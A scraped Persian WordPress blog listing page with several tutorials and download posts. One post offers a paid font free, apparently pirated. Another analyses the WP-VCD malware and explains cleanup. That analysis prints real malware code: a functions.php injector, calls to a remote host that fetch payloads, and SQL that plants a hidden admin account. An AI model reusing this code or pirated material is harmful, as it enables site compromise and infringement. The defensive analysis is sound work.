دیجی اسکریپت

دیجی اسکریپت | صفحه 10 از 1256 | دانلود رایگان اسکریپت

آموزش استفاده از بخش حمل و نقل در ثبت محصول ووکامرس

امروز قصد داریم شما را با آموزش استفاده از بخش حمل و نقل در ثبت محصول ووکامرس آشنا سازیم هم چنین در رابطه با قسمت محصولات مرتبط هم اطلاعاتی در اختیار شما قرار دهیم. جهت دسترسی به آموزش های قبلی ووکامرس می توانید از لینک های زیر استفاده نمایید.

Future-of-Transport

ورود به بخش انبار محصولات  ووکامرس

برای ورود به بخش حمل و نقل ووکامرس از قسمت پیشخوان وردپرس مراجعه نموده، سپس به قسمت محصولات رفته و از منوی کشویی باز شده بر روی محصولات می رویم. در آخر بر روی محصولات کلیک نموده تا وارد صفحه ی زیر شوید. صفحه ی باز شده محصولات کلی وب سایت فروشگاهی شما را نمایش می دهد و به شما اطلاعاتی در مورد محصولاتی که از قبل ثبت نمودید را نشان می دهد. برای ثبت محصول بر روی افزودن محصول کلیک نمایید.

 

پس از ورود به صفحه ی ثبت محصولات از بخش اطلاعات محصول که در زیر توضیحات می باشد بر روی حمل و نقل کلیک نمایید. پس از کلیک نمودن بر روی بخش حمل و نقل با تصویر زیر روبرو خواهید شد که در این مقاله به توضیح در مورد بخش حمل و نقل محصولات ووکامرس و محصولات مرتبط خواهیم پرداخت.

 

در کادر وزن شما وزن محصول خود را با توجه به واحدی که در بخش تنظیمات افزونه ووکامرس مشخص کردید وارد نمایید. توجه کنید این قسمت برای محاسبه هزینه حمل و نقل خیلی مهم و کاربردی می باشد پس حتما آن را دقیق وارد نمایید تا در محاسبه ی هزینه ی حمل و نقل سیستم دچار اشتباه نشود. در مقاله ی بعدی به معرفی افزونه ی جدیدی از تیم ووکامرس پارسی در وب سایت جهت محاسبه هزینه حمل و نقل برای شما و آموزش نحوه ی استفاده از آن خواهیم پرداخت.

بخش ابعاد هم همانطور که مشاهده می نمایید مربوط به سایز محصول شما می باشد که در آن می توانید اندازه آن را با توجه به واحدی که در تنظیمات افزونه فروشگاهی ووکامرس مشخص نمودید وارد نمایید.

 

قسمت محصولات مرتبط

بخش دیگر محصولات مرتبط می باشد که برای دسترسی به آن پس از ورود به صفحه ی ثبت محصولات از بخش اطلاعات محصول که در زیر توضیحات می باشد بر روی محصولات مرتبط کلیک نمایید. پس از کلیک نمودن بر روی بخش محصولات مرتبط با تصویر زیر روبرو خواهید شد.

 

در این قسمت شما می توانید محصولاتی که با محصول شما در ارتباط هستند را مشخص نمایید. به عنوان مثال اگر فردی به محصول گوشی تلفن همراه مراجعه نمود در بخش پایین به آن فرد گارد گوشی و یا قاب همان مدل گوشی را هم پیشنهاد بده این بخش می تواند در افزایش فروش شما کمک بسزایی داشته باشد و کاربر به هنگام خرید محصول مورد نظر محصولی دیگر که با آن مرتبط است را مشاهده و پس از انتخاب آن را به سبد خرید خود اضافه نماید.

 

برای این کار کافی است ۳ کاراکتر از محصول دیگر را که قبلا ثبت نموده اید در کادر مشخص شده تایپ نمایید پس از تایپ نمودن سیستم به صورت خودکار محصولاتی را که با این نام ثبت شده اند به شما نمایش خواهند داد. سپس آن ها را از لیست انتخاب نموده تا به عنوان محصولات مرتبط با محصول مورد نظر شما نمایش داده شوند.

نوشته آموزش استفاده از بخش حمل و نقل در ثبت محصول ووکامرس اولین بار در پدیدار شد.



لینک منبع مطلب

نمایش زمینه دلخواه وردپرس خارج از حلقه Loop

ممکن است در هنگام طراحی قالب وردپرس بخواهید مقدار زمینه دلخواه استفاده شده در مطالب را در محلی از پوسته که بیرون حلقه وردپرس قرار دارد، نمایش دهید تا پوسته مطابق سلیقه و رابط کاربری شکل بگیرد. پیش از این نحوه عدم نمایش و خالی گذاشتن کادر کاستوم فیلد هایی که مقدار ندارند را آموزش دادیم که میتوانید از آن نیز برای حرفه ای تر شدن پوسته استفاده کنید.

 

اکنون قصد معرفی و آموزش نحوه استفاده از کد نمایش زمینه دلخواه وردپرس خارج از حلقه Loop WordPress را داریم تا بتوانید کاستوم فیلدها را بیرون حلقه و در محل دلخواه قرار دهید، این کار میتواند متناسب با رابط کاربری پوسته بسیار مفید و کاربردی باشد پس تا انتها همراه ما باشید.

 

Creating-a-Custom-WordPress-Messaging-System-Part-2

کد نمایش زمینه دلخواه وردپرس بیرون از حلقه لوپ

همینطور که میدانید به طور پیشفرض برای نمایش مقدار زمینه های دلخواه باید کد و توابع آنرا درون حلقه وردپرس بکار ببریم اما میتوان با استفاده از توابع زیر این محدودیت را برداشت تا در هر مکان از فایل single.php پوسته که مختص یک نوشته خاص است بتوانیم از زمینه های آن پست استفاده کنیم. برای این منظور کد زیر را در محل مورد نظر از قالب قرار دهید. در اینجا نام زمینه ما freescript میباشد که در خط سوم قرار دارد و میتوانید آنرا با نام زمینه دلخواه مورد استفاده در پوسته تان تغییر دهید.

 

<?php
global $wp_query;$postid = $wp_query->post->ID;
echo get_post_meta($postid, 'freescript', true);wp_reset_query(); ?>

 

نوشته نمایش زمینه دلخواه وردپرس خارج از حلقه Loop اولین بار در پدیدار شد.



لینک منبع مطلب

دانلود فونت عربی Loew Next – مجموعه فونت پرمیوم Loew Next Arabic

Loew Next Arabic یک مجموعه فونت بسیار زیبا و حرفه ای است که در ۸ وزن و سبک متفاوت طراحی شده است. این فونت توسط The Northern Block Ltd طراحی شده و با قیمت ۱۱۳.۵۹ دلار در مارکت به فروش میرسد که شما کاربران گرامی میتوانید نسخه نهایی و خریداری شده این محصول را بصورت کاملا رایگان و با یک کلیک از وب سایت بیست اسکریپت دریافت نمایید. در ادامه به برخی دیگر از امکانات این فونت اشاره می کنیم

 

دانلود فونت عربی Loew Next   مجموعه فونت پرمیوم Loew Next Arabic

 

برخی از امکانات Loew Next Arabic:

  • طراحی حرفه ای فونت با بالاترین کیفیت
  • مناسب برای انواع طرح ها و پروژه ها
  • نسخه پرمیوم (غیر رایگان) – نسخه کامل و خریداری شده محصول
  • نمایش بی نقص تمامی حروف و اعداد بدون مشکل
  • قابل استفاده در تمامی نرم افزارها
  • دارای قابلیت تبدیل به وب فونت

نوشته دانلود فونت عربی Loew Next – مجموعه فونت پرمیوم Loew Next Arabic اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

تغییر تعداد مطالب دسته وردپرس نسبت به صفحه اصلی

ممکن است برای شما نیز پیش آمده باشد که بخواهید تعداد مطالب مورد نمایش در صفحات مختلف قالب وردپرس را تغییر دهید تا تعداد پستهای صفحه اصلی کمتر یا بیشتر از برگه ی بایگانی، جستجو، دسته بندی موضوعات سایت و … باشد، این قابلیت بیشتر در پوسته هایی که دارای ستون کناری هستند و میخواهیم تعداد مطالب صفحه index با ستون کناری همتراز شود تا ظاهر سایت زیباتر جلوه کند کاربردی است.

wordpress-logo

در این آموزش از فری اسکریپت به معرفی کد تغییر تعداد مطالب دسته وردپرس نسبت به صفحه اصلی می پردازیم که میتوانید با قرار دادن آن در فایل فانکشن functions.php قالب وردپرس و یا افزونه اختصاصی سایت وردپرسی تان از آن استفاده کنید پس تا انتها همراه ما باشید.

 

کد تغییر تعداد مطالب دسته وردپرس

کد زیر را بین تگ های باز <?php و بسته <? پی اچ پی در فایل فانکشن پوسته قرار دهید. کد اول تعداد مطالب کل صفحات بایگانی تاریخی، دسته موضوعی، جستجو و … را تغییر میدهد اما کد دوم تنها برای تغییر تعداد نوشته های دسته بندی ها کاربرد دارد که باتوجه به نیاز پوسته وردپرس تان میتوانید از آنها استفاده کنید.

 

//code1 - all archive pages post
function number_of_posts_on_archive($query){
if($query->is_archive){$query->set('posts_per_page', 12);}return $query;}
add_filter('pre_get_posts','number_of_posts_on_archive');
// code2 - category page posts
if ($query-> is_category()){$query->set('posts_per_page', 15);}

 

نوشته تغییر تعداد مطالب دسته وردپرس نسبت به صفحه اصلی اولین بار در پدیدار شد.



لینک منبع مطلب

افزونه سیستم لایسنس وردپرس WordPress Licensing System Basic

WordPress Licensing System Basic نام یک افزونه صدور مجوز قدرتمند ساخته شده برای افزونه های وردپرس و یا ایجاد کننده تم و پروژه هایی است که نیاز به امنیت و کنترل دارایی ها دارند. شما می توانید این افزونه را در محصولات خود مستقر کنید تا کنترل کنید چه کسانی حق استفاده از آنها را دارند. با این سیستم ساده و آسان شما اطمینان حاصل می کنید که محصولاتتان به سرقت نرفته اند. شما می توانید سیستم تولید را با نرم افزار صورتحساب خود تلفیق کرده و یک کلید صحیح را به مشتریان خود عرضه کنید. با استفاده از این نرم افزار می توانند اسکریپت یا نرم افزار را از طریق شبکه محافظت کرده و ردیابی کنند.

 

افزونه سیستم لایسنس وردپرس WordPress Licensing System Basic

 

افزونه WordPress Licensing System Basic به کلاس Auth PHP احتیاج ندارد، بنابراین می توانید کلیدها را بر روی هر پلتفرم یا زبان اسکریپت مستقر کنید. با افزودن رشته تطابق به عنوان سطح امنیتی دوم، به کاربر نهایی نیاز است تا یک کلید معتبر را همراه با کلید مطابقت مربوطه تهیه کند. این کلید مطابقت می تواند دامنه یا آدرس IP سرور جایی باشد که اسکریپت در آن فعالیت دارد. با استفاده از افزونه WordPress Licensing System Basic، می توانید از یک کاربر منفرد برای استفاده از محصول خود ، فقط در یک سرور واحد استفاده کنید. در ادامه مطلب به برخی از مهم ترین ویژگی های افزونه سیستم لایسنس وردپرس WordPress Licensing System Basic اشاره خواهیم کرد.

 

امکانات افزونه سیستم لایسنس وردپرس WordPress Licensing System Basic:

  • محافظت از اسکریپت و نرم افزار شما در برابر سرقت و استفاده غیر مجاز
  • ارائه کلیدهای مبتنی بر زمان و محصول
  • امکان تنظیم محصول اختصاصی مرتبط با کلید مجوز
  • امکان ایجاد کلید مجوز تک یا چند دامنه
  • امکان ذخیره سازی کلید ها در MySQL از پنل مدیریت
  • امکان ذخیره، فعال سازی و غیرفعال کردن کلیدها از طریق پایگاه داده
  • امکان تنظیم الگوی کلید از پنل مدیریت وردپرس
  • امکان افزودن پیشوند به کلیدها
  • امکان ذخیره سازی ایمیل های مشتری، نام کاربری، دامنه، IP سرور و غیره
  • API ساده
  • قابلیت استفاده برای اسکریپت ها، برنامه های دسک تاپ ، برنامه های موبایل و غیره
  • قابل ادغام با ووکامرس
  • سازگار با وردپرس ۴٫۳ و بالاتر
  • سازگار با ووکامرس ۳٫۲ و بالاتر
  • سازگار با انواع مرورگرها مانند IE8, IE9, IE10, IE11, Firefox, Safari, Opera, Chrome
  • و بسیاری امکانات دیگر

نوشته افزونه سیستم لایسنس وردپرس WordPress Licensing System Basic اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

ثبت سایت در گوگل سرچ کنسول از روش اصولی

ثبت سایت در گوگل سرچ کنسول از روش اصولی

یکی از گام های مهم برای بهینه سازی سایت موتورهای جستجو افزودن سایت وردپرس به ابزار گوگل وب مستر میباشد. در این مقاله ما به شما روش انجام این کار را آموزش میدهیم.

google-search-console

 

ابزار گوگل وب مستر چیست؟

 

ابزار گوگل وب مستر مجموعه ای از ابزار ارائه شده توسط گوگل به ناشران محتوا است که نگاهی به چگونگی روند ثبت شدن و ایندکس وب سایت خود توسط موتور جستجوگر بیندازند که گزارش ها و داده هایی را که میتوانند به شما در درک تفاوت صفحات در وب سایت کمک کنند و نتیجه را در نتایج جستجو نمایش دهند مهیا میکند. نمایش جستجو را در یک صفحه از وب سایت که در نتایج ظاهر میشود نشان میدهد.

 

 

این داده ها به شما کمک میکنند تا مقاله های قدیمی را بهبود ببخشید,محتوای جدید بنویسید و استراتژی محتوا را برای وب سایت خود تدوین و فرموله کنید. ابزار گوگل وب مستر به شما اجازه ی ارسال نقشه ی XML از وب سایت را میدهد. همچنین به گوگل در نمایش دادن محتوای مهم وب سایت کمک میکند. همچنین اگر مشکلی در سایت مانند توقف گوگل از ایندکس کردن صفحات در صفحه وجود داشته باشد به شما اطلاع میدهد.

 

نحوه ی افزودن سایت وردپرس به ابزار گوگل وب مستر

 

به ابزار گوگل وب مستر رفته و با حساب گوگل به سیستم وارد شوید. پس از ورود آدرس وب سایت را وارد کرده و گزینه add site را بزنید. در صفحه بعد از شما خواسته میشود تا به منظور بررسی مالکیت وب سایت اضافه کنید. میتوانید فایل HTML را برای دایرکتوری وب سایت خود با استفاده از FTP آپلود کرده و یا کلیک روی  Alternate method آپلود کنید تا یک برچسب متا که میتوانید به سایت وردپرس اضافه کنید بدست آورید.

 

برای راحتی اضافه کردن برچسب متا به وب سایت میتوانید افزونه Insert Headers and Footers را نصب کنید. برچسب متا را مانند زیر اضافه کنید:

“meta name=”google-site-verification>

</” content=”VerificationKeyCode

 

اکنون به تنظیمات> Insert Headers and Footers بروید و خط برچسب متا را در فیلد هدر کپی کنید. تغییرات را ذخیره کرده و به ابزار گوگل وب مستر بازگردید و روی  Verify site کلیک کنید. اگر از افزونه سئوی وردپرس استفاده کنید میتوانید کلید باز بینی را در محتوای بخش برچسب متا کپی کنید و در افزونه سئوی وردپرس قرار دهید. در نوار کناری مدیریت وردپرس روی SEO کلیک کنید و در قسمت پایین به ابزار وب مستر بروید و کلید یکتا را در گوگل وب مستر کپی کنید.

 

زمانیکه وب سایت شما تایید شد کاری که باید انجام دهید موقع ساخت نقشه سایت میباشد. سپس سایت مپ را از بخش sitemaps ثبت کرده و پس از پایان انجام این کار ممکن است زمانی طول بکشد تا داده های سایت برای گوگل نمایش داده شود.

نوشته ثبت سایت در گوگل سرچ کنسول از روش اصولی اولین بار در پدیدار شد.



لینک منبع مطلب

شیوع بدافزار WP-VCD در وردپرس و راه حل آن

از مشکلات عمده جامعه وردپرس فارسی اینه که محصولات افزونه و قالب وردپرس که به صورت نال شده و غیر اورجینال تهیه شده و در اختیار کسانی که به دنبال خرید قالب و افزونه هستند قرار گرفته است. اما مشکل بزرگتر درست وقتی رخ میده که از یک طرف به دلیل تحریم و از طرف دیگه به علت افزایش هزینه برای خرید این محصولات خیلی از افراد از خیر خرید مستقیم از سایت‌هایی مثل انوانتو گذشته و از مارکت‌ها و فروشگاه‌های ایرانی که هیچ تضمینی در اصالت محصولات وجود نداره خرید خود را انجام می‌دهند.

 

شیوع بدافزار WP VCD در وردپرس و راه حل آن

 

شیوع بدافزار WP-VCD در سایت‌های وردپرسی

در طی یک سال گذشته بدافزار WP-VCD از همین طریق باعث آلوده شدن بسیاری از سایت‌های وردپرسی شده است. این بدافزار که از طریق فایل‌های قالب و افزونه وردپرس به سایت تزریق میشه میتونه یک یوزر ادمین به صورت خودکار ایجاد کرده و کارهای خرابکارانه روی سایت شما اعمال بکنه. به محض شروع کار بدافزار WP-VCD کدهایی در هسته اصلی وردپرس، قالب وردپرس، افزونه وردپرس و در دایرکتوری‌های مختلف دیگه از هاست باعث آلوده شدن ساختار کلی سایت و به دست گرفتن کنترل سایت خواهند شد. که شامل موارد زیر است.

  • ایجاد یک کاربر در وردپرس با نقش کاربری مدیرکل و با نام کاربری ۱۰۰۰۱۰۰۱۰
  • تزریق لینک‌های مخرب در فوتر وردپرس که با استفاده از این لینک‌ها معمولا کارهایی خرابکارانه مثل استفاده از روش‌های کلاه سیاه سئو برای ضربه زدن به سایت شده و از طرفی با نمایش تبلیغات اسپم در سایت قربانی باعث پنالتی شدن سایت در گوگل خواهد شد.
  • تزریق کدها از طریق فایل functions.php قالب که جزو مهم‌ترین فایل در قالب وردپرس است و با استفاده از اون میشه هر کاری را در سایت انجام داد. کدی که در این فایل تزریق میشه حتی امکان تغییر در محتوای مطالب و به‌روزرسانی نوشته‌ها در وردپرس را هم دارد.
  • این بدافزار صرفا به همینجا بسنده نکرده و با قرار دادن فایل‌های مخرب دیگه در پوشه wp-includes کارهای خرابکارانه بیشتری را هم روی سایت انجام خواهد داد که در ادامه به معرفی این فایل‌ها می‌پردازم.

 

نحوه شیوع بدافزار WP-VCD و کارکرد آن روی سایت

اولین کاری که توسط این بدافزار اعمال میشه با اضافه شدن قطعه کد زیر در فایل post.php که در داخل پوشه wp-includes قرار داره انجام خواهد گرفت.

<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?php
/**  ۲ /**
* Core Post API

همونطور که میبینید در قدم بعدی با اضافه شدن این کد فایلی با نام wp-vcd.php به همین دایرکتوری اضافه میشه که به صورت base64 کدگذاری شده و با نام $install_code شروع به نصب برخی کد در فایل‌ها خواهد کرد.

$install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pIC[...]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
   $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

کاری که کد بالا انجام میده اینه که کدهای زیر را به فایل فانکشن قالب وردپرس اضافه خواهد کرد.

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){
    if (strpos($content, 'WP_V_CD') === false){
        $content = $install_code . $content ;
        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
        touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    }
    else { $ping = false; }
}

سپس از راه دور فایلی با نام o.php را فراخوانی کرده و یک فایل متنی با نام class.wp.php را در پوشه wp-includes قالب قرار خواهد داد. که در کدهای زیر نمونه‌ای از آن را میبینید.

$content = @file_get_contents('http://www.aotson.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
                       @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.aotson.com/admin.txt'));

حالا که کدهای فایل class.wp.php اضافه شدند. شامل کدهای زیر هستند که با استفاده از زبان php و کنترل دیتابیس کاری که انجام میدن اینه که یک یوزر با نام کاربری ۱۰۰۰۱۰۰۱۰ در وردپرس اضافه خواهند کرد و نقش کاربری مدیرکل را به آن خواهند داد.

$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '$P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', 'te@ea.st', '', '2011-06-07 00:00:00', '', '0', '100010010');");

سپس با استفاده از کلید واژه API Toolkit Envato Market احتمالا درخواست یک به‌روزرسانی برای قالب یا افزونه نمایش داده خواهد شد.

if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';
 echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; }}

بعد از این مرحله مجددا از راه دور محتویات فایل codecxc.txt به صورت موقت داخل دایرکتوری php تزریق خواهند شد که کدهای زیر در آن قرار دارند.

$tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setupx");
   $handle = fopen($tmpfname, "w+");
   fwrite($handle, "<?phpn" . $phpCode);

از آنجایی که کدهای مخرب معمولا در قالب‌های پرطرفدار تزریق شده است در برخی قالب‌ها که سایت‌های افراد قربانی از این طریق به بدافزار wp-vcd آلوده شدند کدهای زیر قرار داشتند.

//$exec=exec('mv /var/sites/e/exchange.stirlingworx.tech/public_html/wp-content/themes/Gridlove/gridlove/functions.php');
//file_put_contents('/home/hoefsmederijvanr/public_html/wp-content/themes/betheme/functions.php', $file);

حالا از همین طریق مجددا با استفاده از تزریق کدهایی در فانکشن قالب این بار سعی میشه تا در دیتابیس دست برده بشه و ساختار کلی دیتابیس برای جایگزینی لینک‌ها و هر نوع محتوایی تغییر خواهند یافت که در زیر نمونه‌ای از اونو میبینید که ازش برای تغییر جدول post که مربوط به نوشته‌ها هست استفاده شده است.

foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
[...]
$post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);
[...]
$file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
[...]
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))

با استفاده از محتوای html که در کدهای بالا قرار داره فایلی با نام code1.php از راه دور کدهایی مجددا به فایل فانکشن قالب اضافه شده و شروع به اضافه کردن فایل دیگری با نام wp-tmp.php در پوشه wp-includes خواهد کرد که محتویات زیر در این فایل قرار دارند.

if ( ! function_exists( 'wp_temp_setup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if($tmpcontent = @file_get_contents("http://www.aotson.com/code1.php?i=".$path))

که در نهایت بعد از اجرای این کدها هم کدهای html زیر به سایت اضافه خواهند شد.

<style>.crdtsp{position:absolute;left:-1000px;}</style>
<div class="crdtsp"> 
<a href="https://www.downloadfreethemes.download/">downloadfreethemes</a></div>

اگر بخشی از کدهای فوق را در گوگل جستجو کنید با نتایج زیر برخورد خواهید کرد که نشان از شیوع گسترده این بدافزار در بسیاری از سایت‌ها وردپرسی دارد.

شیوع بدافزار WP VCD در وردپرس و راه حل آن

اما مسئله به قدری بزرگ و فراگیر هست که کار به همینجا ختم نشده و با تزریق کدهای دیگه در بخش‌های مختلف سایت انواع فایل و کارهای خرابکارانه دیگه روی سایت صورت میگیره که تا به امروز این موارد بررسی شدند. که باید برای اطمینان خاطر از شیوع این بدافزار ابتدا پوشه wp-includes وردپرس خودتون را بررسی کرده و ببینید که کدوم یکی از فایل‌های زیر در اون قرار دارند.

class.wp.php
wp-cd.php
wp-vcd.php
wp-tmp.php
wp-feed.php

اگر هر یک از فایل‌های بالا در پوشه قرار داشتند باید از شیوع بدافزار wp-vcd در سایت خودتون مطمئن بشید و سریعا در اولین اقدام شروع به رفع مشکلات بکنید تا قبل از اینکه تاثیرات بیشتری از اون را در سایت ببینید.

 

توضیحاتی که تا به اینجا از این بدافزار دادم شاید در زمانی که در حال خواندن این مقاله هستید نهایتا ۵ دقیقه به طول بینجامد. اما باید بدونید که اجرای بدافزار به این کندی پیش نخواهد رفت و در کسری از ثانیه کلیه کارهای بالا انجام گرفته و سایت شما را آلوده خواهد کرد.

چطور از شیوع این بدافزار در سایت خود جلوگیری کنیم؟

اگرچه این بدافزار شیوع پیدا کرده زیاد خطرناک نیست و میتوان به راحتی آن را برطرف کنید، اما برای جلوگیری کردن از وقوع آن در سایت خود و قرار نگرفتن در لیست قربانیان بهتر است تا پیش از وقوع حادثه چاره ای بیندیشید. بهترین راهکار این است که اگر همچنان از قالب و افزونه‌ای استفاده می‌کنید که مطمئن نیستید به صورت اورجینال تهیه شده، آن را از فروشنده اصلی دریافت کرده و با نسخه فعلی جایگزین کنید. در بیشتر موارد حتی قالب‌ها و افزونه‌هایی که خریداری می‌کنید از سایت‌ها نال شده به صورت رایگان دانلود شده و پس از فارسی سازی برای فروش با عنوان نسخه اورجینال عرضه می‌شوند که هیچ گاه نباید از چنین سایت‌هایی خریدی انجام دهید. با این کار در حفظ کپی رایت نیز گام بلندی برداشته‌اید و امنیت وردپرس سایت شما نیز بیشتر تامین خواهد شد.

 

در قدم بعدی باید از فایروال هاست خود برای نطارت در روی سایت استفاده بیشتری بکنید. هر چه زودتر بتوانید از اینکه آیا بدافزار در سایتتون نفوذ کرده یا نه جلوگیری کنید، راحت‌تر و سریع‌تر هم میتونید از شیوع بیشتر اون و انجام کارهای خرابکارانه بیشتر جلوگیری کنید. همچنین استفاده از افزونه WordFence Security هم یکی از بهترین راه‌ها برای دانستن زودتر این موضوع است که در صورت اضافه شدن فایلی غیرعادی و جدا از هسته وردپرس در هاست سریعا شما را مطلع خواهد کرد.

 

سایت من به بدافزار wp-vcd آلوده شده، چیکار کنم؟

بعد از اطمینان از این موضوع در اولین اقدام باید به مسیر افزونه‌ها در پیشخوان وردپرس رفته و کلیه افزونه‌های سایت خودتون را که غیر از مخزن وردپرس دانلود و نصب کردید غیرفعال کنید. سپس به مسیر نمایش در پیشخوان وردپرس رفته و یکی از قالب‌های پیشفرض وردپرس را به عنوان پوسته قالب خودتون انتخاب کنید. سپس از بخش کاربران در وردپرس کلیه اعضایی که نقش کاربری مدیر کل دارند را بررسی کنید و اطلاعات هر کاربر را هم چک کنید. اگر کاربری با نام ۱۰۰۰۱۰۰۱۰ یا هر کاربری که مشکوک به نظر میاد مشاهده کردید نقش کاربری وی را از مدیر کل به مشترک تغییر داده و یا اینکه حذف کنید.

 

سپس با استفاده از ابزار اسکن امنیتی موجود در هاست خودتون کل سایت را از نظر امنیتی اسکن و بررسی کنید تا موارد مشکوک را برطرف کنید. در صورتی که با نحوه کارکرد این ابزار آشنایی ندارید میتونید با ارسال تیکت برای میزبانی هاست خودتون مشکل را مطرح کنید تا به کمک هاستینگ بررسی دقیق و کامل‌تری روی سایت شما از نظر امنیتی و رفع مشکل بدافزار صورت بگیرد.

 

پیش از انجام هر گونه تغییراتی در فایل‌های هاست مربوط به وردپرس یا دیتابیس وردپرس یک فو بک آپ از هاست خودتون تهیه کنید تا در صورتی که کاری به اشتباه انجام دادین مشکل را بیش از این بزرگتر نکنید و با جایگزین کردن نسخه فعلی مشکلات را کمتر کرده و به ادامه رفع ایرادات بپردازید.

در مرحله بعدی به آدرس fa.wordpress.org مراجعه کرده و آخرین نسخه وردپرس را از این آدرس دانلود کنید. سپس از داخل فایل zip دانلود شده پوشه wp-content و فایل wp-config.php را حذف کنید. حالا فایل زیپ را در مسیری که وردپرس را نصب کردید آپلود کرده و کلیه محتویات را به غیر از دو مورد ذکر شده جایگزین کنید تا فایل‌های مخرب از پوشه wp-includes حذف شوند.

 

در مرحله بعدی به مسیر تنظیمات> پیوندهای یکتا در پیشخوان وردپرس مراجعه کرده و یک بار روی دکمه ذخیره تغییرات کلیک کنید تا فایل htaccess. وردپرس هم آپدیت بشه تا اگر احیانا از طریق این فایل هم کاری صورت گرفته اصلاح شود. علاوه بر این کلیه پوشه‌های موجود در پوشه wp-contnet را هم بررسی کنید و هر فایل مشکوکی را که بررسی کرده و با نسخه اصلی جایگزین کنید.

 

حالا به phpmyadmin مراجعه کرده و با بررسی کل دیتابیس باید به دنبال این باشید که آیا تغییراتی در دیتابیس ایجاد شده است یا خیر. برای این موضوع باید از یک فرد متخصص کمک بگیرید تا دیتابیس را به درستی بررسی کنه. بیشترین سهم تغییرات در دیتابیس وردپرس توسط این بدافزار مربوط به جدول wp_posts است که نوشته‌ها در آن قرار دارند و با هدف تغییر در نوشته و وارد کردن لینک و محتوای اسپم مورد استفاده قرار می‌گیرد.

 

امیدوارم که این مقاله هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون با بدافزار wp-vcd آشنا شده باشید و امنیت سایت وردپرسی خودتون را حفط نمایید. قابل به ذکر می باشد به دلیل بررسی هایی که قبل قرار دادن فایل در بیست اسکریپت انجام می گیرد و حتی با آنتی ویرس های روز دنیا به صورت آنلاین اسکن می شود ، هیچ وقت شاهده این بد افزار ها نبودیم و نخواهیم بود و با خیال راحت می توانید از آنها در بیست اسکریپت استفاده نمایید.

نوشته شیوع بدافزار WP-VCD در وردپرس و راه حل آن اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

اضافه کردن دسته بندی به آدرس مطالب وردپرس

چگونه دسته بندی و زیرشاخه در آدرسهای اینترنتی وردپرس ایجاد کنیم؟

با ایجاد دسته بندی و زیرشاخه در آدرسهای اینترنتی وردپرس می توانید محتوای سایت خود را مرتب کنید. این کار به کاربران شما اجازه می دهد که براحتی در فهرست موضوعات مورد علاقه خود جستجو کنند.

preview

اضافه کردن دسته بندی به آدرس مطالب وردپرس

وردپرس دو نوع طبقه بندی برای محتوای شما دارد. یکی دسته بندی ها و دیگری برچسب ها. دسته بندی ها معمولاً برای موضوعات گسترده استفاده می شوند و می توانند زیرشاخه داشته باشند. اگر شما از ساختار پیش فرض آدرسهای اینترنتی وردپرس استفاده کنید، دسته بندی ها و زیرشاخه ها در آدرس نمایش داده نمی شوند. بعضی از وب سایتها از دسته بندی ها و زیرشاخه ها برای نوشته های خود در آدرسهای اینترنتی وردپرس استفاده می کنند. وب سایتهایی که از زیرشاخه ها استفاده می کنند، هر دو دسته والد و فرزند را نشان می دهند. اضافه کردن دسته بندی یا زیرشاخه به نوشته های شما، آنها را کاربرپسند می کند.

 

ایجاد دسته بندی و زیرشاخه در آدرسهای اینترتی نوشته های وردپرس

در ابتدا شما باید از بخش مدیریت وب سایت خود وارد تنظیمات یکتا شوید. سپس در قسمت تنظیمات عمومی بر روی ‘custom structure’ یا ساختار سفارشی کلیک کنید. سپس شما باید در فیلد بعدی ساختار سفارشی، /%category%/%postname%/ را وارد کنید.

سپس بر روی دکمه ذخیره تنظیمات کلیک کنید. حال ایجاد شاخه و زیرشاخه در آدرسهای اینترنتی وردپرس را می توانید مشاهده کنید و برای اینکار کافیست که یک نوشته را ویرایش کنید و یا یک نوشته جدید ایجاد کنید.

 

